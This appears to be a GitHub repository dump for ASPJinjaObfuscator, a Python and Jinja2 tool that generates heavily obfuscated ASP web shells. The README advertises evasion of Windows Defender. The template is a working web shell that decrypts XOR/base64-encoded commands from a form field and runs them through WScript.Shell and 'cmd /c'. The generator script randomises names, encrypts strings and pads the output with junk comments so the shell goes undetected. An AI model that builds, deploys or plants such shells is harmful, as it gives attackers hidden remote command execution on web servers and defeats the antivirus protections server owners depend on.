├── requirements.txt ├── img └── ninja.webp ├── LICENSE.md ├── README.md ├── asp-jinja-obfuscator.py └── shell.py.j2 /requirements.txt: -------------------------------------------------------------------------------- 1 | Jinja2>=3.0 2 | pyperclip>=1.8.2 -------------------------------------------------------------------------------- /img/ninja.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fin3ss3g0d/ASPJinjaObfuscator/HEAD/img/ninja.webp -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Dylan Evans 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 6 | 7 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ASPJinjaObfuscator 2 | 3 | ![ninja](img/ninja.webp) 4 | 5 | A heavily obfuscated `Windows` based `ASP` web shell generation tool utilizing the power of Python's `Jinja2` templating engine. Generates a web shell with randomized variable/function names and HTML strings of random lengths, XOR encrypted strings with base64 encoding, a random amount of newlines, a random amount of `VBScript/HTML` comments with a random amount of random strings, and a random encryption key per generation. Tested as bypassing the latest version of `Windows Defender` as of `04/22/2024` with `Cloud-delivered protection` enabled. 6 | 7 | ## Installation 8 | 9 | Make sure that you have `Python3` with the `Jinja2` & `pyperclip` `pip` packages installed. Install the `pip` requirements with the following command: 10 | 11 | ```bash 12 | pip3 install -r requirements.txt 13 | ``` 14 | 15 | ## Usage 16 | 17 | Run the program with no commandline arguments from the directory where the script and the `Jinja2` template is installed, it will then generate a randomized web shell named `output.asp`. The program will ask you what commands you would like to run, type them into the program in plaintext and it will give you the encrypted versions. It will automatically copy them to the clipboard, paste these encrypted commands into the web shell, it will decrypt and then run them. That's it, time to **PROFIT**! -------------------------------------------------------------------------------- /asp-jinja-obfuscator.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | import base64 4 | import pyperclip 5 | from jinja2 import Environment, FileSystemLoader 6 | 7 | def random_string(): 8 | length = random.randint(5, 100) # Generate a random length between 5 and 100 9 | return ''.join(random.choice(string.ascii_letters) for _ in range(length)) 10 | 11 | def xor_encrypt(data, key): 12 | return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data)) 13 | 14 | def encode_base64(data): 15 | return base64.b64encode(data.encode()).decode() 16 | 17 | def render_template(template_name, **kwargs): 18 | env = Environment(loader=FileSystemLoader('./')) 19 | template = env.get_template(template_name) 20 | return template.render(**kwargs) 21 | 22 | def add_random_newlines(template, max_newlines=5): 23 | """ 24 | Adds random newlines to a given template string at the end of lines to avoid breaking the code. 25 | 26 | :param template: str - The original multiline template string. 27 | :param max_newlines: int - The maximum number of newlines to add. 28 | :return: str - The mutated template string with newlines added. 29 | """ 30 | # Split the template into lines 31 | lines = template.splitlines() 32 | 33 | # Select random line indices to add newlines after them 34 | newline_positions = sorted(random.sample(range(len(lines)), min(max_newlines, len(lines)))) 35 | 36 | # Add extra newlines to the selected lines 37 | for index in newline_positions: 38 | lines[index] += '\n' * random.randint(1, 50) # Add between 1 and 50 newlines 39 | 40 | # Reassemble the template with the added newlines 41 | return '\n'.join(lines) 42 | 43 | def generate_comments(spaces_count, html_format=False): 44 | """ 45 | Generates random comment lines with a specified number of spaces prefixed, 46 | each containing a random number of random strings. The format of the comments 47 | can be either HTML or VBScript based on the html_format flag. 48 | 49 | :param spaces_count: int - Number of spaces to prepend to each comment line. 50 | :param html_format: bool - If True, returns HTML formatted comments, else VBScript comments. 51 | :return: str - A string of one or more randomly generated comment lines. 52 | """ 53 | # Random number of comment lines to generate 54 | number_of_comments = random.randint(1, 50) 55 | 56 | # Generate the comment block 57 | comment_block = "" 58 | space_prefix = ' ' * spaces_count 59 | 60 | for _ in range(number_of_comments): 61 | # Random number of strings to generate per comment line 62 | number_of_strings = random.randint(1, 20) 63 | 64 | # Collect multiple random strings 65 | comment_strings = ' '.join(random_string() for _ in range(number_of_strings)) 66 | 67 | if html_format: 68 | comment_block += f"{space_prefix}\n" 69 | else: 70 | comment_block += f"{space_prefix}' {comment_strings}\n" 71 | 72 | return comment_block.strip() 73 | 74 | def obfuscate_code(key): 75 | # Find and replace all template variables 76 | to_replace = { 77 | 'encryptedInput': random_string(), 78 | 'encryptedCommand': random_string(), 79 | 'decryptedCommand': random_string(), 80 | 'objShell': random_string(), 81 | 'objExecObject': random_string(), 82 | 'strOutput': random_string(), 83 | 'keyString': random_string(), 84 | 'tempDecodedString': random_string(), 85 | 'encryption_key': key, 86 | 'cmd_Decrypted': random_string(), 87 | 'WScript_Shell_Decrypted': random_string(), 88 | 'Base64Encode': random_string(), 89 | 'strText': random_string(), 90 | 'objXML': random_string(), 91 | 'objNode': random_string(), 92 | 'StringToBinary': random_string(), 93 | 'MultiByteToBinary': random_string(), 94 | 'arrData': random_string(), 95 | 'stream': random_string(), 96 | 'Base64Decode': random_string(), 97 | 'BinaryToString': random_string(), 98 | 'binaryVal': random_string(), 99 | 'objStream': random_string(), 100 | 'XORStrings': random_string(), 101 | 'input1': random_string(), 102 | 'input2': random_string(), 103 | 'char1': random_string(), 104 | 'char2': random_string(), 105 | 'xorValue': random_string(), 106 | 'result': random_string(), 107 | 'iterator': random_string(), 108 | 'base64DecodedCommand': random_string(), 109 | 'cmd': encode_base64(xor_encrypt("cmd /c ", key)), 110 | 'WScript_Shell': encode_base64(xor_encrypt("WScript.Shell", key)), 111 | 'Execute_Command': random_string(), 112 | 'Execute_Encrypted_Command': random_string(), 113 | 'Enter_Encrypted_Command': random_string(), 114 | 'inputSize': random.randint(5, 250), 115 | 'SubmitValue': random_string(), 116 | 'vbComment': generate_comments(0), 117 | 'vbComment4': generate_comments(4), 118 | 'vbComment8': generate_comments(8), 119 | 'vbComment12': generate_comments(12), 120 | 'htmlComment': generate_comments(0, html_format=True), 121 | 'htmlComment4': generate_comments(4, html_format=True), 122 | 'htmlComment8': generate_comments(8, html_format=True), 123 | } 124 | 125 | # Load the template and render it with the variables 126 | obfuscated_code = render_template('shell.py.j2', **to_replace) 127 | 128 | # Add random newlines to the obfuscated code 129 | return add_random_newlines(obfuscated_code, 100) 130 | 131 | def main(): 132 | key = random_string() 133 | obfuscated_code = obfuscate_code(key) 134 | 135 | with open("output.asp", "w") as output_file: 136 | output_file.write(obfuscated_code) 137 | 138 | while True: 139 | command = input("Enter command to encrypt: ") 140 | encrypted_command = encode_base64(xor_encrypt(command, key)) 141 | print(f"Encrypted: {encrypted_command}") 142 | pyperclip.copy(encrypted_command) 143 | print("Encrypted command copied to clipboard.") 144 | 145 | if __name__ == "__main__": 146 | main() 147 | -------------------------------------------------------------------------------- /shell.py.j2: -------------------------------------------------------------------------------- 1 | <% 2 | {{ vbComment }} 3 | If Request.Form("{{ encryptedInput }}") <> "" Then 4 | {{ vbComment4 }} 5 | Dim {{ encryptedCommand }}, {{ decryptedCommand }} 6 | {{ vbComment4 }} 7 | Dim {{ objShell }}, {{ objExecObject }}, {{ strOutput }} 8 | {{ vbComment4 }} 9 | Dim {{ keyString }}, {{ tempDecodedString }} 10 | {{ vbComment4 }} 11 | Dim {{ cmd_Decrypted }}, {{ WScript_Shell_Decrypted }} 12 | {{ vbComment4 }} 13 | {{ keyString }} = "{{ encryption_key }}" 14 | {{ vbComment4 }} 15 | {{ tempDecodedString }} = {{ Base64Decode }}("{{ cmd }}") 16 | {{ vbComment4 }} 17 | {{ cmd_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }}) 18 | {{ vbComment4 }} 19 | {{ tempDecodedString }} = {{ Base64Decode }}("{{ WScript_Shell }}") 20 | {{ vbComment4 }} 21 | {{ WScript_Shell_Decrypted }} = {{ XORStrings }}({{ tempDecodedString }}, {{ keyString }}) 22 | {{ vbComment4 }} 23 | Function {{ Base64Encode }}({{ strText }}) 24 | {{ vbComment8 }} 25 | Dim {{ objXML }}, {{ objNode }} 26 | {{ vbComment8 }} 27 | Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116)) 28 | {{ vbComment8 }} 29 | Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)) 30 | {{ vbComment8 }} 31 | {{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52) 32 | {{ vbComment8 }} 33 | {{ objNode }}.nodeTypedValue = {{ StringToBinary }}({{ strText }}) 34 | {{ vbComment8 }} 35 | {{ Base64Encode }} = {{ objNode }}.text 36 | {{ vbComment8 }} 37 | Set {{ objNode }} = Nothing 38 | {{ vbComment8 }} 39 | Set {{ objXML }} = Nothing 40 | {{ vbComment8 }} 41 | End Function 42 | {{ vbComment4 }} 43 | Function {{ StringToBinary }}({{ strText }}) 44 | {{ vbComment8 }} 45 | Dim {{ arrData }} 46 | {{ vbComment8 }} 47 | {{ arrData }} = {{ MultiByteToBinary }}({{ strText }}) 48 | {{ vbComment8 }} 49 | {{ StringToBinary }} = {{ arrData }} 50 | {{ vbComment8 }} 51 | End Function 52 | {{ vbComment4 }} 53 | Function {{ MultiByteToBinary }}({{ strText }}) 54 | {{ vbComment8 }} 55 | Dim {{ stream }} 56 | {{ vbComment8 }} 57 | Set {{ stream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109)) 58 | {{ vbComment8 }} 59 | {{ stream }}.Type = 2 60 | {{ vbComment8 }} 61 | {{ stream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49) 62 | {{ vbComment8 }} 63 | {{ stream }}.Open 64 | {{ vbComment8 }} 65 | {{ stream }}.WriteText {{ strText }} 66 | {{ vbComment8 }} 67 | {{ stream }}.Position = 0 68 | {{ vbComment8 }} 69 | {{ stream }}.Type = 1 70 | {{ vbComment8 }} 71 | {{ MultiByteToBinary }} = {{ stream }}.Read 72 | {{ vbComment8 }} 73 | {{ stream }}.Close 74 | {{ vbComment8 }} 75 | Set {{ stream }} = Nothing 76 | {{ vbComment8 }} 77 | End Function 78 | {{ vbComment4 }} 79 | Function {{ Base64Decode }}({{ strText }}) 80 | {{ vbComment8 }} 81 | Dim {{ objXML }}, {{ objNode }} 82 | {{ vbComment8 }} 83 | Set {{ objXML }} = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(68) & Chr(79) & Chr(77) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116)) 84 | {{ vbComment8 }} 85 | Set {{ objNode }} = {{ objXML }}.createElement(Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)) 86 | {{ vbComment8 }} 87 | {{ objNode }}.dataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52) 88 | {{ vbComment8 }} 89 | {{ objNode }}.text = {{ strText }} 90 | {{ vbComment8 }} 91 | {{ Base64Decode }} = {{ BinaryToString }}({{ objNode }}.nodeTypedValue) 92 | {{ vbComment8 }} 93 | Set {{ objNode }} = Nothing 94 | {{ vbComment8 }} 95 | Set {{ objXML }} = Nothing 96 | {{ vbComment8 }} 97 | End Function 98 | {{ vbComment4 }} 99 | Function {{ BinaryToString }}({{ binaryVal }}) 100 | {{ vbComment8 }} 101 | Dim {{ objStream }} 102 | {{ vbComment8 }} 103 | Set {{ objStream }} = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109)) 104 | {{ vbComment8 }} 105 | {{ objStream }}.Type = 1 106 | {{ vbComment8 }} 107 | {{ objStream }}.Open 108 | {{ vbComment8 }} 109 | {{ objStream }}.Write {{ binaryVal }} 110 | {{ vbComment8 }} 111 | {{ objStream }}.Position = 0 112 | {{ vbComment8 }} 113 | {{ objStream }}.Type = 2 114 | {{ vbComment8 }} 115 | {{ objStream }}.Charset = Chr(105) & Chr(115) & Chr(111) & Chr(45) & Chr(56) & Chr(56) & Chr(53) & Chr(57) & Chr(45) & Chr(49) 116 | {{ vbComment8 }} 117 | {{ BinaryToString }} = {{ objStream }}.ReadText 118 | {{ vbComment8 }} 119 | {{ objStream }}.Close 120 | {{ vbComment8 }} 121 | Set {{ objStream }} = Nothing 122 | {{ vbComment8 }} 123 | End Function 124 | {{ vbComment4 }} 125 | Function {{ XORStrings }}({{ input1 }}, {{ input2 }}) 126 | {{ vbComment8 }} 127 | Dim {{ result }} 128 | {{ vbComment8 }} 129 | Dim {{ iterator }} 130 | {{ vbComment8 }} 131 | Dim {{ char1 }}, {{ char2 }}, {{ xorValue }} 132 | {{ vbComment8 }} 133 | {{ result }} = "" 134 | {{ vbComment8 }} 135 | For {{ iterator }} = 1 To Len({{ input1 }}) 136 | {{ vbComment12 }} 137 | {{ char1 }} = Asc(Mid({{ input1 }}, {{ iterator }}, 1)) 138 | {{ vbComment12 }} 139 | {{ char2 }} = Asc(Mid({{ input2 }}, ({{ iterator }} - 1) Mod Len({{ input2 }}) + 1, 1)) 140 | {{ vbComment12 }} 141 | {{ xorValue }} = {{ char1 }} Xor {{ char2 }} 142 | {{ vbComment12 }} 143 | {{ result }} = {{ result }} & Chr({{ xorValue }}) 144 | {{ vbComment12 }} 145 | Next 146 | {{ vbComment8 }} 147 | {{ XORStrings }} = {{ result }} 148 | {{ vbComment8 }} 149 | End Function 150 | {{ vbComment4 }} 151 | {{ encryptedCommand }} = Request.Form("{{ encryptedInput }}") 152 | {{ vbComment4 }} 153 | {{ base64DecodedCommand }} = {{ Base64Decode }}({{ encryptedCommand }}) 154 | {{ vbComment4 }} 155 | {{ decryptedCommand }} = {{ XORStrings }}({{ base64DecodedCommand }}, {{ keyString }}) 156 | {{ vbComment4 }} 157 | Set {{ objShell }} = CreateObject({{ WScript_Shell_Decrypted }}) 158 | {{ vbComment4 }} 159 | Set {{ objExecObject }} = {{ objShell }}.Exec({{ cmd_Decrypted }} & {{ decryptedCommand }}) 160 | {{ vbComment4 }} 161 | {{ strOutput }} = {{ objExecObject }}.StdOut.ReadAll() 162 | {{ vbComment4 }} 163 | Set {{ objExecObject }} = Nothing 164 | {{ vbComment4 }} 165 | Set {{ objShell }} = Nothing 166 | {{ vbComment4 }} 167 | End If 168 | {{ vbComment }} 169 | %> 170 | 171 | {{ htmlComment }} 172 | 173 | {{ htmlComment }} 174 | {{ Execute_Command }} 175 | {{ htmlComment4 }} 176 | 177 | {{ htmlComment }} 178 | 179 | {{ htmlComment }} 180 |

{{ Execute_Encrypted_Command }}

181 | {{ htmlComment4 }} 182 |
183 | {{ htmlComment8 }} 184 |
185 | {{ htmlComment8 }} 186 |

187 | {{ htmlComment8 }} 188 | 189 | {{ htmlComment8 }} 190 |
191 | {{ htmlComment4 }} 192 | <% If Request.Form("{{ encryptedInput }}") <> "" Then %> 193 | {{ htmlComment8 }} 194 | 
<%={{ strOutput }}%>
195 | {{ htmlComment8 }} 196 | <% End If %> 197 | {{ htmlComment4 }} 198 | 199 | {{ htmlComment }} 200 | --------------------------------------------------------------------------------